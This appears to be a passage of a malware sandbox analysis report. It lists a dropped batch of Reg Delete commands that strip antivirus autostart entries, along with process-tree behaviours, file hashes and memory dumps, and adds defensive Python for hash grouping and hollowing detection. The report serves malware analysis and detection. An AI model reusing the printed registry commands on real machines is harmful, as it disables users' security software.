  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
  Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
  Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
  )
- C:\Users\Admin\AppData\Local\Temp\3153.exe
  command line: C:\Users\Admin\AppData\Local\Temp\3153.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
    - Drops startup file
- C:\Users\Admin\AppData\Local\Temp\3403.exe
  command line: C:\Users\Admin\AppData\Local\Temp\3403.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\3403.exe
    command line: C:\Users\Admin\AppData\Local\Temp\3403.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 1460
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\3B96.exe
  command line: C:\Users\Admin\AppData\Local\Temp\3B96.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\936B.exe
  command line: C:\Users\Admin\AppData\Local\Temp\936B.exe
  - Executes dropped EXE
  - C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 732
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 744
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 844
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 880
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 820
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\explorer.exe
  command line: C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
  command line: C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
  command line: C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
  command line: C:\Windows\SysWOW64\explorer.exe
- C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe
- C:\Windows\SysWOW64\explorer.exe
  command line: C:\Windows\SysWOW64\explorer.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Runtimebroker.exe
  MD5    16e7880b76dbc82d50fd96f38d1c2692
  SHA1   b8b49ef406f74e50c7386f2fecbff18447ad9f4d
  SHA256 9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
  SHA512 69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5    6bf0e5945fb9da68e1b03bdaed5f6f8d
  SHA1   eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
  SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
  SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5    8ce78b13ac7c4c69c41d65af180d51c1
  SHA1   8d59540790dfb716c1580aa5ec0e1ffb26ad3eed
  SHA256 f285de202c983c211c0dcc3e3baa4293b9f1d94272552b75840d7ffdec9ed443
  SHA512 c9b95a1475c98764a5fc11c309dbfa53237323ab52681a3ab65583f234eb82bc52ae87ddd845d334c1b7124c460a8c52f4efad287054e6d93916d5807240271e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5    f1b160ab95f106dd13dfcf8d05e0b976
  SHA1   eb5639c4e3ac2dc464b5b0ca0b803127b4d24bcf
  SHA256 e4059ef810c98d6328d0cc37d3fca5a88549044a3fce535db1e027d4067e0168
  SHA512 9c34285d084563ce73d5edf539d186e8c07ce357af46c4ee0b9ae5dbf11a4ddb1be3c1177d0a91169d205e5fb1383590f977657c102f4a9de115bd217a9856e1
- C:\Users\Admin\AppData\Local\Temp\2EF0.exe
  MD5    16e7880b76dbc82d50fd96f38d1c2692
  SHA1   b8b49ef406f74e50c7386f2fecbff18447ad9f4d
  SHA256 9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
  SHA512 69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
- C:\Users\Admin\AppData\Local\Temp\3153.exe
  MD5    b19ac380411ed5d8b5a7e7e0c1da61a6
  SHA1   9665c20336a5ce437bbf7b564370bfa43e99954c
  SHA256 aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
  SHA512 73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
- C:\Users\Admin\AppData\Local\Temp\3403.exe
  MD5    5707ddada5b7ea6bef434cd294fa12e1
  SHA1   45bb285a597b30e100ed4b15d96a29d718697e5e
  SHA256 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
  SHA512 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
- C:\Users\Admin\AppData\Local\Temp\3B96.exe
  MD5    717d65dba56f47e540dca074c3977b3d
  SHA1   d58aa30f826f41663e693f0ad930fdce584f1672
  SHA256 61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
  SHA512 b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
- C:\Users\Admin\AppData\Local\Temp\936B.exe
  MD5    4297e9e27602c1ab910f6c214a2b3ce7
  SHA1   a2ee7d601157c05818a3fd2dd46e51b272078b95
  SHA256 c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d
  SHA512 a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5
- C:\Users\Admin\AppData\Local\Temp\s.bat
  MD5    469602cbc560ba3db0b148b419ee102b
  SHA1   6aab3456fd5f51baba8985de261b706d14ec548b
  SHA256 817257701107988072eeb51bf3bafd8abe7b64b09b86f2c14547c4a6cc6fba9e
  SHA512 2979f142438ba760c08c9d6af3af60186e0d6b1fe7e6436ffac368b5902729c9ceb351cf85e097b8c594a376f686b7e276305eac08b04624d747b15d17b4a3fd
- \Users\Admin\AppData\LocalLow\sqlite3.dll
  MD5    f964811b68f9f1487c2b41e1aef576ce
  SHA1   b423959793f14b1416bc3b7051bed58a1034025f
  SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
  SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
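Two entries in this listing carry identical digests under different names: C:\ProgramData\Runtimebroker.exe and C:\Users\Admin\AppData\Local\Temp\2EF0.exe (MD5 16e7880b76dbc82d50fd96f38d1c2692). The dropped 2EF0.exe was therefore copied into ProgramData under a name resembling the Windows RuntimeBroker.exe, and that copy, not the temp-directory name, is the one to hunt for when checking persistence. As an added example (not part of the report), the Python below parses the listing in the flattened form it arrives in here (path fused with "MD5", algorithm name fused with its digest), validates each digest's length, and groups paths by SHA256 so that renamed copies fall out automatically. SAMPLE_LISTING is constructed from four of the entries above, with one duplicate entry kept to show that duplicates are collapsed.

```python
"""Parse a dropped-file listing and find one payload written under several names.

Added example, not part of the sandbox report. SAMPLE_LISTING reproduces the
report's flattened layout for four entries (path fused with "MD5", algorithm
name fused with its digest); the digests are the ones the report shows.
"""
import re
from collections import defaultdict

SAMPLE_LISTING = r"""
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
C:\Users\Admin\AppData\Local\Temp\2EF0.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
C:\Users\Admin\AppData\Local\Temp\2EF0.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
C:\Users\Admin\AppData\Local\Temp\s.batMD5
469602cbc560ba3db0b148b419ee102b
SHA16aab3456fd5f51baba8985de261b706d14ec548b
SHA256817257701107988072eeb51bf3bafd8abe7b64b09b86f2c14547c4a6cc6fba9e
SHA5122979f142438ba760c08c9d6af3af60186e0d6b1fe7e6436ffac368b5902729c9ceb351cf85e097b8c594a376f686b7e276305eac08b04624d747b15d17b4a3fd
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# "SHA1<hex>", "SHA256<hex>", "SHA512<hex>": the alternation is unambiguous because
# the character after "SHA" (1, 2 or 5) decides the algorithm before any digest text.
ALGO_RE = re.compile(r"^SHA(1|256|512)([0-9a-fA-F]+)$")


def parse_listing(text):
    """Return a list of {"path", "MD5", "SHA1", "SHA256", "SHA512"} records."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("MD5"):                    # "<path>MD5" opens a record
            cur = {"path": line[: -len("MD5")]}
            records.append(cur)
        elif cur is not None and "MD5" not in cur:  # bare line after the header is the MD5
            cur["MD5"] = line.lower()
        else:
            m = ALGO_RE.match(line)
            if cur is None or not m:
                raise ValueError(f"unexpected line: {line!r}")
            cur["SHA" + m.group(1)] = m.group(2).lower()
    for rec in records:                             # a truncated digest is worse than none
        for algo, length in DIGEST_LEN.items():
            if len(rec.get(algo, "")) != length:
                raise ValueError(f"{rec['path']}: missing or malformed {algo}")
    return records


def group_by_sha256(records):
    """SHA256 -> distinct paths, in first-seen order (duplicate entries collapse)."""
    groups = defaultdict(list)
    for rec in records:
        if rec["path"] not in groups[rec["SHA256"]]:
            groups[rec["SHA256"]].append(rec["path"])
    return dict(groups)


def renamed_copies(records):
    """Only the digests that appear under more than one path: the same file, moved or renamed."""
    return {h: paths for h, paths in group_by_sha256(records).items() if len(paths) > 1}


if __name__ == "__main__":
    for digest, paths in renamed_copies(parse_listing(SAMPLE_LISTING)).items():
        print(digest, "->", " | ".join(paths))
```

Grouping by SHA256 rather than by name is the habit that matters here: the temp-directory names (2EF0.exe, 3153.exe and so on) are random per run, while the ProgramData copy is the artifact that survives a reboot.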
- memory/196-214-0x0000000000000000-mapping.dmp
- memory/196-221-0x0000000000BE0000-0x0000000000BE7000-memory.dmp  Filesize 28KB
- memory/196-222-0x0000000000BD0000-0x0000000000BDC000-memory.dmp  Filesize 48KB
- memory/208-124-0x0000000002DD0000-0x0000000002F1A000-memory.dmp  Filesize 1.3MB
- memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize 596KB
- memory/208-132-0x0000000000400000-0x0000000002C7D000-memory.dmp  Filesize 40.5MB
- memory/208-182-0x000000000044003F-mapping.dmp
- memory/208-118-0x0000000000000000-mapping.dmp
- memory/208-184-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize 596KB
- memory/668-157-0x0000000000000000-mapping.dmp
- memory/680-213-0x00000000079E0000-0x00000000079E1000-memory.dmp  Filesize 4KB
- memory/680-209-0x0000000004680000-0x0000000004681000-memory.dmp  Filesize 4KB
- memory/680-232-0x00000000097B0000-0x00000000097B1000-memory.dmp  Filesize 4KB
- memory/680-237-0x0000000004683000-0x0000000004684000-memory.dmp  Filesize 4KB
- memory/680-239-0x0000000009320000-0x000000000947B000-memory.dmp  Filesize 1.4MB
- memory/680-208-0x0000000004682000-0x0000000004683000-memory.dmp  Filesize 4KB
- memory/680-201-0x0000000000000000-mapping.dmp
- memory/1320-171-0x0000000006C60000-0x0000000006C61000-memory.dmp  Filesize 4KB
- memory/1320-173-0x00000000074E0000-0x00000000074E1000-memory.dmp  Filesize 4KB
- memory/1320-192-0x00000000088F0000-0x00000000088F1000-memory.dmp  Filesize 4KB
- memory/1320-191-0x0000000007CA0000-0x0000000007CA1000-memory.dmp  Filesize 4KB
- memory/1320-190-0x0000000008970000-0x0000000008971000-memory.dmp  Filesize 4KB
- memory/1320-177-0x0000000006CD0000-0x0000000006CD1000-memory.dmp  Filesize 4KB
- memory/1320-236-0x0000000000600000-0x000000000060F000-memory.dmp  Filesize 60KB
- memory/1320-235-0x0000000000610000-0x0000000000619000-memory.dmp  Filesize 36KB
- memory/1320-206-0x00000000066B3000-0x00000000066B4000-memory.dmp  Filesize 4KB
- memory/1320-162-0x0000000000000000-mapping.dmp
- memory/1320-234-0x0000000000000000-mapping.dmp
- memory/1320-166-0x00000000064E0000-0x00000000064E1000-memory.dmp  Filesize 4KB
- memory/1320-167-0x0000000006CF0000-0x0000000006CF1000-memory.dmp  Filesize 4KB
- memory/1320-168-0x00000000066B0000-0x00000000066B1000-memory.dmp  Filesize 4KB
- memory/1320-169-0x00000000066B2000-0x00000000066B3000-memory.dmp  Filesize 4KB
- memory/1320-170-0x0000000006AE0000-0x0000000006AE1000-memory.dmp  Filesize 4KB
- memory/1396-154-0x0000000000400000-0x0000000002C7D000-memory.dmp  Filesize 40.5MB
- memory/1396-150-0x0000000000000000-mapping.dmp
- memory/1396-153-0x0000000002CC0000-0x0000000002CFB000-memory.dmp  Filesize 236KB
- memory/1640-220-0x00000000048A0000-0x0000000004931000-memory.dmp  Filesize 580KB
- memory/1640-223-0x0000000000400000-0x0000000002CA9000-memory.dmp  Filesize 40.7MB
- memory/1640-197-0x0000000000000000-mapping.dmp
- memory/1872-115-0x0000000000402E1A-mapping.dmp
- memory/1872-114-0x0000000000400000-0x0000000000409000-memory.dmp  Filesize 36KB
- memory/1924-287-0x000000007E520000-0x000000007E521000-memory.dmp  Filesize 4KB
- memory/1924-219-0x0000000000A00000-0x0000000000A6B000-memory.dmp  Filesize 428KB
- memory/1924-270-0x0000000008CC0000-0x0000000008CF3000-memory.dmp  Filesize 204KB
- memory/1924-255-0x0000000000D22000-0x0000000000D23000-memory.dmp  Filesize 4KB
- memory/1924-254-0x0000000000D20000-0x0000000000D21000-memory.dmp  Filesize 4KB
- memory/1924-242-0x0000000000000000-mapping.dmp
- memory/1924-200-0x0000000000000000-mapping.dmp
- memory/1924-290-0x0000000000D23000-0x0000000000D24000-memory.dmp  Filesize 4KB
- memory/1924-218-0x0000000000A70000-0x0000000000AE4000-memory.dmp  Filesize 464KB
- memory/2080-285-0x0000000000000000-mapping.dmp
- memory/2080-288-0x0000000000F00000-0x0000000000F05000-memory.dmp  Filesize 20KB
- memory/2080-289-0x0000000000EF0000-0x0000000000EF9000-memory.dmp  Filesize 36KB
- memory/2100-145-0x0000000005060000-0x0000000005061000-memory.dmp  Filesize 4KB
- memory/2100-149-0x0000000005120000-0x0000000005121000-memory.dmp  Filesize 4KB
- memory/2100-176-0x0000000006B30000-0x0000000006B31000-memory.dmp  Filesize 4KB
- memory/2100-174-0x0000000006A30000-0x0000000006A31000-memory.dmp  Filesize 4KB
- memory/2100-164-0x00000000067F0000-0x00000000067F1000-memory.dmp  Filesize 4KB
- memory/2100-160-0x0000000006C00000-0x0000000006C01000-memory.dmp  Filesize 4KB
- memory/2100-159-0x0000000006500000-0x0000000006501000-memory.dmp  Filesize 4KB
- memory/2100-141-0x00000000772E0000-0x000000007746E000-memory.dmp  Filesize 1.6MB
- memory/2100-142-0x0000000000210000-0x0000000000211000-memory.dmp  Filesize 4KB
- memory/2100-135-0x0000000000000000-mapping.dmp
- memory/2100-148-0x00000000052C0000-0x00000000052C1000-memory.dmp  Filesize 4KB
- memory/2100-147-0x0000000005130000-0x0000000005131000-memory.dmp  Filesize 4KB
- memory/2100-144-0x0000000005740000-0x0000000005741000-memory.dmp  Filesize 4KB
- memory/2100-146-0x00000000050C0000-0x00000000050C1000-memory.dmp  Filesize 4KB
- memory/2432-258-0x00000000004C0000-0x00000000004CC000-memory.dmp  Filesize 48KB
- memory/2432-256-0x00000000004D0000-0x00000000004D6000-memory.dmp  Filesize 24KB
- memory/2432-247-0x0000000000000000-mapping.dmp
- memory/2856-259-0x0000000000000000-mapping.dmp
- memory/2856-262-0x0000000003720000-0x0000000003724000-memory.dmp  Filesize 16KB
- memory/2856-265-0x0000000003710000-0x0000000003719000-memory.dmp  Filesize 36KB
- memory/2972-139-0x0000000000400000-0x0000000002D86000-memory.dmp  Filesize 41.5MB
- memory/2972-156-0x0000000000400000-0x0000000002D86000-memory.dmp  Filesize 41.5MB
- memory/2972-138-0x00000000033E0000-0x0000000003623000-memory.dmp  Filesize 2.3MB
- memory/2972-121-0x0000000000000000-mapping.dmp
- memory/2972-155-0x00000000051E0000-0x00000000053F1000-memory.dmp  Filesize 2.1MB
- memory/3008-240-0x0000000000CA0000-0x0000000000CA5000-memory.dmp  Filesize 20KB
- memory/3008-241-0x0000000000C90000-0x0000000000C99000-memory.dmp  Filesize 36KB
- memory/3008-238-0x0000000000000000-mapping.dmp
- memory/3016-117-0x00000000012D0000-0x00000000012E6000-memory.dmp  Filesize 88KB
- memory/3128-116-0x0000000000030000-0x000000000003A000-memory.dmp  Filesize 40KB
- memory/3464-230-0x0000000001030000-0x000000000103B000-memory.dmp  Filesize 44KB
- memory/3464-228-0x0000000001040000-0x0000000001047000-memory.dmp  Filesize 28KB
- memory/3464-225-0x0000000000000000-mapping.dmp
- memory/3476-130-0x0000000005760000-0x0000000005761000-memory.dmp  Filesize 4KB
- memory/3476-131-0x0000000005160000-0x0000000005161000-memory.dmp  Filesize 4KB
- memory/3476-179-0x0000000005130000-0x0000000005151000-memory.dmp  Filesize 132KB
- memory/3476-128-0x0000000000760000-0x0000000000761000-memory.dmp  Filesize 4KB
- memory/3476-125-0x0000000000000000-mapping.dmp
- memory/3476-133-0x0000000005260000-0x000000000575E000-memory.dmp  Filesize 5.0MB
- memory/3476-134-0x00000000050F0000-0x00000000050F1000-memory.dmp  Filesize 4KB
- memory/3728-283-0x0000000000CA0000-0x0000000000CA5000-memory.dmp  Filesize 20KB
- memory/3728-286-0x0000000000C90000-0x0000000000C99000-memory.dmp  Filesize 36KB
- memory/3728-263-0x0000000000000000-mapping.dmp
- memory/3844-508-0x0000000000000000-mapping.dmp
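The dump names encode the PID, a sequence number and the dumped address range, so the list above can be mined without opening a single file. The region size is simply end minus start (0x495000 - 0x400000 = 0x95000 bytes = 596KB, matching the reported Filesize), which is a cheap sanity check on the parse. More interesting is PID 208, the 3403.exe instance that WerFault later reports with `-p 208`: its parent 3403.exe carries the SetThreadContext and WriteProcessMemory signatures, and PID 208 has both a 596KB image region at 0x400000 and a mapping.dmp at 0x44003F inside that region. A non-zero mapping address that falls inside a freshly written 0x400000 image is what a hollowed process looks like once the injector has pointed the thread at the new image's entry point; PID 1872 (0x402E1A inside 0x400000-0x409000) shows the same shape. As an added example (not part of the report), the Python below parses such names, verifies the sizes and flags PIDs with that pattern. SAMPLE_DUMPS is copied from the list above; IMAGE_BASE and the rule in hollowing_candidates() are my own heuristic, not a sandbox signature.

```python
"""Mine sandbox memory-dump names for size consistency and hollowing indicators.

Added example, not part of the sandbox report. SAMPLE_DUMPS is copied from the
report's list (name plus reported Filesize); IMAGE_BASE and
hollowing_candidates() are my own heuristic, not a sandbox signature.
"""
import re
from collections import defaultdict

MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
MAP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<addr>[0-9A-Fa-f]+)-mapping\.dmp$")

# (dump name, Filesize as printed in the report, or None for mapping dumps)
SAMPLE_DUMPS = [
    ("memory/196-214-0x0000000000000000-mapping.dmp", None),
    ("memory/196-221-0x0000000000BE0000-0x0000000000BE7000-memory.dmp", "28KB"),
    ("memory/208-118-0x0000000000000000-mapping.dmp", None),
    ("memory/208-124-0x0000000002DD0000-0x0000000002F1A000-memory.dmp", "1.3MB"),
    ("memory/208-132-0x0000000000400000-0x0000000002C7D000-memory.dmp", "40.5MB"),
    ("memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmp", "596KB"),
    ("memory/208-182-0x000000000044003F-mapping.dmp", None),
    ("memory/1872-114-0x0000000000400000-0x0000000000409000-memory.dmp", "36KB"),
    ("memory/1872-115-0x0000000000402E1A-mapping.dmp", None),
    ("memory/3016-117-0x00000000012D0000-0x00000000012E6000-memory.dmp", "88KB"),
]

IMAGE_BASE = 0x400000  # preferred base of most 32-bit PE images (assumption behind the heuristic)


def format_size(n_bytes):
    """Render a byte count the way the report does: whole KB below 1 MiB, else one-decimal MB."""
    if n_bytes < 1 << 20:
        return f"{n_bytes // 1024}KB"
    return f"{n_bytes / (1 << 20):.1f}MB"


def parse_dumps(entries):
    """Group dump names by PID into dumped regions and mapping addresses."""
    procs = defaultdict(lambda: {"regions": [], "mappings": []})
    for name, reported in entries:
        m = MEM_RE.match(name)
        if m:
            start, end = int(m.group("start"), 16), int(m.group("end"), 16)
            procs[int(m.group("pid"))]["regions"].append({
                "seq": int(m.group("seq")), "start": start, "end": end, "size": end - start,
                # the printed Filesize must equal end - start; a mismatch means a mis-parsed name
                "size_ok": reported is None or format_size(end - start) == reported,
            })
            continue
        m = MAP_RE.match(name)
        if m:
            procs[int(m.group("pid"))]["mappings"].append(int(m.group("addr"), 16))
            continue
        raise ValueError(f"unrecognised dump name: {name}")
    return dict(procs)


def hollowing_candidates(procs):
    """PIDs that have a region at IMAGE_BASE and a non-zero mapping address inside it.

    A mapping at 0x0 is the ordinary case. A mapping that points into a region
    starting at the image base is what a hollowed process looks like once the
    injector has set the thread context to the replaced image's entry point.
    """
    hits = {}
    for pid, info in procs.items():
        base = [r for r in info["regions"] if r["start"] == IMAGE_BASE]
        entries = [a for a in info["mappings"]
                   if a and any(r["start"] <= a < r["end"] for r in base)]
        if entries:
            hits[pid] = {"entry": entries[0], "image_size": min(r["size"] for r in base)}
    return hits


if __name__ == "__main__":
    procs = parse_dumps(SAMPLE_DUMPS)
    for pid, hit in hollowing_candidates(procs).items():
        print(f"pid {pid}: thread entry 0x{hit['entry']:X} inside a "
              f"{format_size(hit['image_size'])} image at 0x{IMAGE_BASE:X}")
```

The 596KB region (memory/208-181 and 208-184) is the one to pull for static analysis of the unpacked payload; the 40.5MB dump of the same process covers the whole 0x400000-0x2C7D000 range and is mostly slack.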